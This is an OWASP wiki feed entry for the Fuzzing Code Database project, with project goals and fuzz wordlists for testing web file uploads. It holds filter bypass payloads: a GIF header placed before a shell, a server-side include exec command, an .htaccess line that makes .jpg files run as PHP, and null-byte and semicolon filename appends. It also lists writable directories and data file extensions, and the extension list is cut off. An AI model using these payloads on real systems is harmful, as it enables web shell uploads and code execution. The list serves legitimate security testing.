| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80067</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80067"/>
				<updated>2010-03-17T20:45:41Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* File Upload Filter Bypass   (Update: 17 March 2009 - notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 - notes ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&amp;lt;pre&amp;gt;{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863) ===&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
